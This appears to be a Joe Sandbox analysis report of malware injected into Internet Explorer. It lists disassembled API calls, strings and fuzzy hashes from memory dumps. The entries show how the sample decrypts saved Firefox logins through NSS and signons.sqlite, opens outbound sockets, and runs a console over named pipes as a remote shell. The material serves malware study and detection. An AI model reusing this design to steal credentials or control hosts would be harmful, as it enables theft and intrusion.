      • CreatePipe.KERNEL32(?,?,?,00000000,?,00000000), ref: 04B516B5
      • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,00000000), ref: 04B516D2
      • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,00000000), ref: 04B516EF
      • DuplicateHandle.KERNEL32(?,?,?,?,00000000,00000000,00000002,?,00000000), ref: 04B51719
      • DuplicateHandle.KERNEL32(?,?,?,?,00000000,00000000,00000002,?,00000000), ref: 04B5173D
      • DuplicateHandle.KERNEL32(?,?,?,?,00000000,00000000,00000002,?,00000000), ref: 04B51761
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateDuplicateHandlePipe$CurrentProcess
      • String ID: I can not start %s
      • API String ID: 2614934276-3975370208
      • Opcode ID: 37608dade596d2692c3882bbb09a620eca8710581750bfb59bc1415e3e7bdc1d
      • Instruction ID: ee6369e902f5ab47ac4ed1907e48f542aefe33552c5e21dd641f8e0b3c11d526
      • Opcode Fuzzy Hash: 37608dade596d2692c3882bbb09a620eca8710581750bfb59bc1415e3e7bdc1d
      • Instruction Fuzzy Hash: 1F91E1B2910118AFDB25DF65CC80F9AB7BDEF48254F4049E9F60993161D630BE85DF24
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 04B46275: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?), ref: 04B462A4
        • Part of subcall function 04B46275: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?), ref: 04B462E5
      • DeleteFileW.KERNEL32(?,00000001,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 04B53E61
      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00000000), ref: 04B53F10
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharDeleteFileMultiWide
      • String ID: .cfg$clientpath$clientpath$md5$md5$offset$serverpath$serverpath$size$size$total$total
      • API String ID: 845983722-322701809
      • Opcode ID: b284efc3fcba11cd83f817b23c269fe819d3bd3f7874ac0d7d3c00bb21e2eea3
      • Instruction ID: f27e737e69724f7ffaab46178181c7b32db950e845adfc1bb5c4ab31d0adcf78
      • Opcode Fuzzy Hash: b284efc3fcba11cd83f817b23c269fe819d3bd3f7874ac0d7d3c00bb21e2eea3
      • Instruction Fuzzy Hash: 6AC19071940218AFDF29EBA4CC95EEDB7B8EF59304F0004D9E905A7160EB70BA44DF61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 04B4B841: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Mozilla\Mozilla Firefox,00000000,00000001,00000000), ref: 04B4B85B
      • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\Mozilla Firefox,?,00000104), ref: 04B4BED4
        • Part of subcall function 04B4BCAA: SetCurrentDirectoryA.KERNEL32(?), ref: 04B4BD05
        • Part of subcall function 04B4BCAA: LoadLibraryA.KERNEL32(00000000), ref: 04B4BD12
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 04B4BD2E
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 04B4BD3B
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 04B4BD48
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 04B4BD55
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 04B4BD62
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11_CheckUserPassword), ref: 04B4BD6F
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 04B4BD7C
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 04B4BD89
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_step), ref: 04B4BD96
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_column_text), ref: 04B4BDA3
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 04B4BDB0
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_finalize), ref: 04B4BDBD
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_column_count), ref: 04B4BDCA
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_prepare_v2), ref: 04B4BDD7
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_close), ref: 04B4BDE4
      • ExpandEnvironmentStringsA.KERNEL32(?,00000104), ref: 04B4BEF9
      • GetPrivateProfileStringA.KERNEL32(Profile0,Path,04B71679,?,00000104,?), ref: 04B4BF3F
      • GetProcessHeap.KERNEL32(00000000,?), ref: 04B4C093
      • HeapFree.KERNEL32(00000000), ref: 04B4C09C
      • GetProcessHeap.KERNEL32(00000000,?), ref: 04B4C0A5
      • HeapFree.KERNEL32(00000000), ref: 04B4C0A8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$Heap$EnvironmentExpandFreeProcessStrings$CurrentDirectoryLibraryLoadOpenPrivateProfileString
      • String ID: %ProgramFiles%\Mozilla Firefox$%s\%s$%s\%s\signons.sqlite$Path$Profile0$\profiles.ini
      • API String ID: 662691741-2422494077
      • Opcode ID: f84f9cff077324e2fdcf3cc807236b0c82ce6240e71b2a6d38a0110978b41f19
      • Instruction ID: 9959e9145bba980a1345f19b1ad6ee52e6488aa81197a13c9274821d81f5ec28
      • Opcode Fuzzy Hash: f84f9cff077324e2fdcf3cc807236b0c82ce6240e71b2a6d38a0110978b41f19
      • Instruction Fuzzy Hash: F571ECB280522CAEDF219F64DC45EDABBBDEF88214F0005D6F519E3150DA35AF949F60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _free
      • String ID:
      • API String ID: 269201875-0
      • Opcode ID: f2dfe58acfb27b59e97d92ff92dbd437b0a33aaaa50f900b6e48d4fa3b098174
      • Instruction ID: b68897c6e97f5a195058240fd73698393d64015657bf74755369cb55ac74b4ad
      • Opcode Fuzzy Hash: f2dfe58acfb27b59e97d92ff92dbd437b0a33aaaa50f900b6e48d4fa3b098174
      • Instruction Fuzzy Hash: C2A10975C01209EFEF10DF94D8849EEBBB5FF48300F18452EE615BA290D7319A60DB95
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock
      • String ID:
      • API String ID: 3889854259-0
      • Opcode ID: 31fcbac28a118d0a83d0a860ce8ee3dcbc92e749a40bd67e00ef5edecd6979de
      • Instruction ID: 52c773146ed7ab18d73de1403ec4b327098a16d538b56b95f5f9ea9762353f7d
      • Opcode Fuzzy Hash: 31fcbac28a118d0a83d0a860ce8ee3dcbc92e749a40bd67e00ef5edecd6979de
      • Instruction Fuzzy Hash: 5D21B139146701ABE721FF24E804AAABBE5EFD1750B10842EE8885A564EF31D9308A51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e298893edad3138669fc941745400671b76b682ad310a8beb094197ea774632a
      • Instruction ID: a73c181a8863a0ce01a4ee2f916e449f53dd9e4aa0fc0bf1a2e733555c54b456
      • Opcode Fuzzy Hash: e298893edad3138669fc941745400671b76b682ad310a8beb094197ea774632a
      • Instruction Fuzzy Hash: 31125E35A012689FDF21DF28CC84BE9B7B4FF0A355F0441DAE41AA6951D778AE80CF52
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • select.WS2_32(?,?,?,00000000,0000012C), ref: 04B5359C
      • __WSAFDIsSet.WS2_32(?,?), ref: 04B535B7
      • RtlEnterCriticalSection.NTDLL(04B9CAA4), ref: 04B535C9
      • RtlLeaveCriticalSection.NTDLL(04B9CAA4), ref: 04B5362E
      • send.WS2_32(?,?,?,00000000), ref: 04B5364B
      • __WSAFDIsSet.WS2_32(?,?), ref: 04B53670
      • recv.WS2_32(?,?,00005000,00000000), ref: 04B53687
      • WSAGetLastError.WS2_32(?,?,00005000,00000000,?,?,00000000,?,?), ref: 04B5369A
        • Part of subcall function 04B4CDB5: RtlEnterCriticalSection.NTDLL(00000078), ref: 04B4CDF4
        • Part of subcall function 04B4CDB5: RtlLeaveCriticalSection.NTDLL(00000078), ref: 04B4CE06
      • RtlLeaveCriticalSection.NTDLL(04B9CAA4), ref: 04B5371C
      • closesocket.WS2_32 ref: 04B53728
      • RtlEnterCriticalSection.NTDLL(04B9CAA4), ref: 04B53734
      • RtlLeaveCriticalSection.NTDLL(04B9CAA4), ref: 04B53745
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Leave$Enter$ErrorLastclosesocketrecvselectsend
      • String ID:
      • API String ID: 1051765158-0
      • Opcode ID: d16fc7e532043d87e8ee8cf621341dadb2e6be71ac5c18a8ec72c7d318082979
      • Instruction ID: 39740492331024f6be061f5a241d8de69ca01b0b30068d14f7f68ac4b6b79285
      • Opcode Fuzzy Hash: d16fc7e532043d87e8ee8cf621341dadb2e6be71ac5c18a8ec72c7d318082979
      • Instruction Fuzzy Hash: 9E514271D016189BDB20EBA8DC44EDEB7B8EF85345F0001E6E909E3660E7356E85CF61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ReadFile.KERNEL32(?,?,00000024,?,?), ref: 04B4FFD9
      • GetLastError.KERNEL32 ref: 04B4FFE3
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B50005
      • ResetEvent.KERNEL32(?), ref: 04B50015
      • GetTickCount.KERNEL32 ref: 04B50036
      • GetTickCount.KERNEL32 ref: 04B5004A
      • GenerateConsoleCtrlEvent.KERNEL32(00000000,00000000), ref: 04B5005B
      • GetStdHandle.KERNEL32(000000F6,?,00000001,?), ref: 04B5006F
      • WriteConsoleInputW.KERNEL32(00000000), ref: 04B50076
      • ResetEvent.KERNEL32(?), ref: 04B50084
      • SetEvent.KERNEL32(?), ref: 04B50097
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B500A3
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Event$ConsoleCountResetTick$CtrlDisconnectErrorFileGenerateHandleInputLastNamedObjectPipeReadSingleWaitWrite
      • String ID:
      • API String ID: 1452265146-0
      • Opcode ID: ea80306f09d2e7a0e83ec47904309e3372d8c4180859703ca0ba1a1f94fd863e
      • Instruction ID: 75fb3f59ff23baf7083502ba59f03b6535766e09bc6047e462749697f15e08c8
      • Opcode Fuzzy Hash: ea80306f09d2e7a0e83ec47904309e3372d8c4180859703ca0ba1a1f94fd863e
      • Instruction Fuzzy Hash: DB313E71904108EFDB20EFB9D948EAEF7B8EF45315B080567E91AD6260DB78BC409B61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset$__wfsopen_fgetws
      • String ID:
      • API String ID: 857616032-0
      • Opcode ID: e49d8022fa705720970f30762d4ff37bf65fbeff7b9347eb30a424e15d4e7880
      • Instruction ID: a9209cee2b3e9383ab8a217bf5614117e9678b26ed04a9bdd420ef4c0b1fd75a
      • Opcode Fuzzy Hash: e49d8022fa705720970f30762d4ff37bf65fbeff7b9347eb30a424e15d4e7880
      • Instruction Fuzzy Hash: 4AA18375901219AEEB61DBA4CC45EDBB3FCEF45350F4444A6E948DB180EB31AA94CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B53776
      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 04B537BA
      • setsockopt.WS2_32(?,0000FFFF,00001006,00002710,00000004), ref: 04B537CF
      • closesocket.WS2_32 ref: 04B537D9
      • Sleep.KERNEL32(00000064), ref: 04B537E1
      • htons.WS2_32(?), ref: 04B537FA
      • inet_addr.WS2_32(?), ref: 04B53803
      • connect.WS2_32(?,?,00000010), ref: 04B53811
      • CreateThread.KERNEL32(00000000,00000000,Function_00013512,?,00000000,?), ref: 04B5382D
      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04B5383F
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B5384A
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: setsockoptsocket$CreateObjectSingleSleepThreadWaitclosesocketconnecthtonsinet_addr
      • String ID:
      • API String ID: 3072795916-0
      • Opcode ID: b57da6e6412aed1453afedb33d96845e5ed90a354fb07666e92561a3ead10994
      • Instruction ID: d90406f502185e7d12eaf43d091f9379b9ace2d0450fa7298176fd761fba655a
      • Opcode Fuzzy Hash: b57da6e6412aed1453afedb33d96845e5ed90a354fb07666e92561a3ead10994
      • Instruction Fuzzy Hash: CF314F71A00209BFEB10DFA9DC4AFAEBBB8EF48710F100166FA11E76E0D67459449B71
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: <
      • API String ID: 0-4251816714
      • Opcode ID: a4cd2bc90e788a9b630e6bf4f6f65b27e52c98499bfff1fcd51af088478625d8
      • Instruction ID: 497faecd5d1645404d69b427223bf4c2c29da2bd2abc6bfd6a5843150ac5102e
      • Opcode Fuzzy Hash: a4cd2bc90e788a9b630e6bf4f6f65b27e52c98499bfff1fcd51af088478625d8
      • Instruction Fuzzy Hash: 670295B19012589FEB21DB60CD84FEAB7BDEF45304F0448A9E14AB7191DBB19E84CF51
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID:
      • API String ID: 2102423945-0
      • Opcode ID: 3f75da51cdd9bbe95de4315788ed81d3cbc4f575dfd9279629cde29537c007a5
      • Instruction ID: d9619a11e100e4adc1c881772ba4fe403c641da9a395cba64bdaa0d9a735bcf5
      • Opcode Fuzzy Hash: 3f75da51cdd9bbe95de4315788ed81d3cbc4f575dfd9279629cde29537c007a5
      • Instruction Fuzzy Hash: 15B14AB59022299BCF20DB69DD84DEEB2FDAB48704F4445F6F649E7060D6309BD18FA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: htonsrecvfromsendto
      • String ID:
      • API String ID: 2952609444-0
      • Opcode ID: 37910c448db58479c9c695a2f9ea8ca3ae605a5df17670e654e92c5b74de3abf
      • Instruction ID: 833925c16fc46910008eeb521ed9e4b3936bf8de092f94b38df8c7235c3456b7
      • Opcode Fuzzy Hash: 37910c448db58479c9c695a2f9ea8ca3ae605a5df17670e654e92c5b74de3abf
      • Instruction Fuzzy Hash: 36B163719003699ADB35DB68CC58AEABBB9FF44304F0005EAE58DE3252D6746EC4CF20
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ReadFile.KERNEL32(?,?,00007D32,?,?), ref: 04B50863
      • GetLastError.KERNEL32 ref: 04B5086D
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B50884
      • ResetEvent.KERNEL32(?), ref: 04B50891
      • ResetEvent.KERNEL32(?), ref: 04B5089C
      • SetEvent.KERNEL32(?), ref: 04B508AF
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B508B8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Event$Reset$DisconnectErrorFileLastNamedObjectPipeReadSingleWait
      • String ID: "}
      • API String ID: 1515994312-3370080606
      • Opcode ID: 06c4b8dc8eafd1aff7a64b6862e01fdbc5f41cf8c8571523b09b95fe804db18c
      • Instruction ID: 28a8a311c256262aab06620a0d9f4710ad7fd38507f5a0dd409c8e1e743b07ff
      • Opcode Fuzzy Hash: 06c4b8dc8eafd1aff7a64b6862e01fdbc5f41cf8c8571523b09b95fe804db18c
      • Instruction Fuzzy Hash: 93318371D082149BEB20AF69DC44ABDB7B8EF44704F0045E7E91ED61A0EB34BE45DE60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ____lc_handle_func.LIBCMT ref: 03018386
      • ____lc_codepage_func.LIBCMT ref: 0301838E
      • __GetLocaleForCP.LIBCPMT ref: 030183B6
      • ____mb_cur_max_l_func.LIBCMT ref: 030183CC
      • ____mb_cur_max_l_func.LIBCMT ref: 030183F9
      • ___pctype_func.LIBCMT ref: 0301841E
      • ____mb_cur_max_l_func.LIBCMT ref: 03018444
      • ____mb_cur_max_l_func.LIBCMT ref: 0301845C
      • ____mb_cur_max_l_func.LIBCMT ref: 03018474
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ____mb_cur_max_l_func$Locale____lc_codepage_func____lc_handle_func___pctype_func
      • String ID:
      • API String ID: 1487047833-0
      • Opcode ID: 1ce2620ba3af472b35559b788683815c83fa717012711414309c873a02583322
      • Instruction ID: cf7b61044d209134b4158a82a64733d6cd43f6653c67da0adb451e40d9c72dea
      • Opcode Fuzzy Hash: 1ce2620ba3af472b35559b788683815c83fa717012711414309c873a02583322
      • Instruction Fuzzy Hash: F141B171106351EFEB21DF30C880BBA7BE9AF41250F1CC469F959CA091EB70C6B0EA58
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • TerminateThread.KERNEL32(?,00000000,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04B4FF27
      • TerminateThread.KERNEL32(?,00000000,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04B4FF36
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF46
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF4F
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF5C
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF69
      • TerminateProcess.KERNEL32(?,00000000,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04B4FF75
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF86
      • FreeConsole.KERNEL32(04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4FF90
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$Terminate$Thread$ConsoleFreeProcess
      • String ID:
      • API String ID: 3759374865-0
      • Opcode ID: bd1027825ddabc6e7a8578c0121214bd9221e984de3db262ab01626fced7f400
      • Instruction ID: e6928e0b122a9561d803858f51058d67861a13b3270c71dcbdb83ff8e4687c41
      • Opcode Fuzzy Hash: bd1027825ddabc6e7a8578c0121214bd9221e984de3db262ab01626fced7f400
      • Instruction Fuzzy Hash: 22014830B05301ABDB30EA7A9C44F67B3ECEF91B51F15086AE549D3280DA68F800DA30
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • LoadLibraryW.KERNEL32(Kernel32.dll,?,04B4C61C,?,04B4CEB3), ref: 04B4C536
      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 04B4C553
      • GetProcAddress.KERNEL32(?,Wow64RevertWow64FsRedirection), ref: 04B4C55F
      • FreeLibrary.KERNEL32(?), ref: 04B4C571
      Strings
      • Wow64DisableWow64FsRedirection, xrefs: 04B4C54D
      • Wow64RevertWow64FsRedirection, xrefs: 04B4C555
      • Kernel32.dll, xrefs: 04B4C531
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressLibraryProc$FreeLoad
      • String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
      • API String ID: 2256533930-1575494070
      • Opcode ID: fd0204de9ff2395ad085e1e5f3968c5f21afddb44f0dc65d09c0cd285db81c8d
      • Instruction ID: d7c0bdd59d534d0f2cd4290b311af92cfb1ef349228f08861221b2dee4376546
      • Opcode Fuzzy Hash: fd0204de9ff2395ad085e1e5f3968c5f21afddb44f0dc65d09c0cd285db81c8d
      • Instruction Fuzzy Hash: 00F054315153129FD720AF7CEC067677EF4EB84A15F11486EE0D5D2210E775A4809F60
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: _com_issue_errorex$__fassign_free_malloc_strrchr
      • String ID:
      • API String ID: 1535473290-0
      • Opcode ID: 9f14b7e8f100f4f15e568078733c77d5178d4ce7c2e247d49943b798443daed2
      • Instruction ID: 40274cf99a90510c2e28348deb1d8fe1e4127c46f848e3c7c18318d04f79f5ab
      • Opcode Fuzzy Hash: 9f14b7e8f100f4f15e568078733c77d5178d4ce7c2e247d49943b798443daed2
      • Instruction Fuzzy Hash: B4711BB1901249AFEF15DFE8CCC4DEEBBB9AF89204F148569F106EB150D771A905CB60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B5607F
      • closesocket.WS2_32(00000000), ref: 04B560A6
      • send.WS2_32(00000000,00000000,0000000C,00000000), ref: 04B560D1
      • recv.WS2_32(?,-0000004C,0000004C,00000000), ref: 04B560F5
      • Sleep.KERNEL32(00000001,?,?,?,?,?,04B5588A), ref: 04B56104
      • Sleep.KERNEL32(0000004D), ref: 04B56174
      • closesocket.WS2_32(?), ref: 04B5618F
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: Sleepclosesocket$recvsendsocket
      • String ID:
      • API String ID: 210098885-0
      • Opcode ID: 392029b7221fddffefb295defe01fd730c2f0eece7c65288de70ebd1ad4cd973
      • Instruction ID: 3b48a33dd8f2b954e81aea87737d68c2857aa1ccd30ace316c88e5e568be36d2
      • Opcode Fuzzy Hash: 392029b7221fddffefb295defe01fd730c2f0eece7c65288de70ebd1ad4cd973
      • Instruction Fuzzy Hash: 64418071A00219AFDB10AF68DC45FAEBBB8FF44714F40019AF919DB2A1D774E951CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: Maklocchr
      • String ID: false$true
      • API String ID: 1214102354-2658103896
      • Opcode ID: ff0e39d06e6a6c216b4d7621fee42e56817d1e903a8bf13a2ddcaf81f2680f4c
      • Instruction ID: 6896dcec8e89085780434a58f21dac14168e487b20275653b5ed68a8fd068e7f
      • Opcode Fuzzy Hash: ff0e39d06e6a6c216b4d7621fee42e56817d1e903a8bf13a2ddcaf81f2680f4c
      • Instruction Fuzzy Hash: 333112F1D04749AEEB10EFF9C4805DEFBF9EF48214F04945AD865A7211D630AA009F75
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,0000009C,00000100,?,?,?,?,00000001,00000001,00000001,00000001), ref: 04B5BF82
      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 04B5BFF0
      • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 04B5C00C
      • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 04B5C045
      • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 04B5C0AB
      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 04B5C0CA
        • Part of subcall function 04B593FA: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 04B5943F
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: ByteCharMultiStringWide$AllocateHeap
      • String ID:
      • API String ID: 1400492145-0
      • Opcode ID: c48b5896c3e5160e494a4bca26325e9be36fcfd6138933953e9baf29eeba1e65
      • Instruction ID: 19d80a534aa13647556e979250383d2a06c9c7a8497a7545f80d47a4b343215c
      • Opcode Fuzzy Hash: c48b5896c3e5160e494a4bca26325e9be36fcfd6138933953e9baf29eeba1e65
      • Instruction Fuzzy Hash: 4551AF72900249EFEF119FA4CC80AAEBFB6EB88354F1841A9F915E7170D731E8619F50
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: __setlocale_get_all_strcspn_strlen_strpbrk
      • String ID:
      • API String ID: 2761703447-0
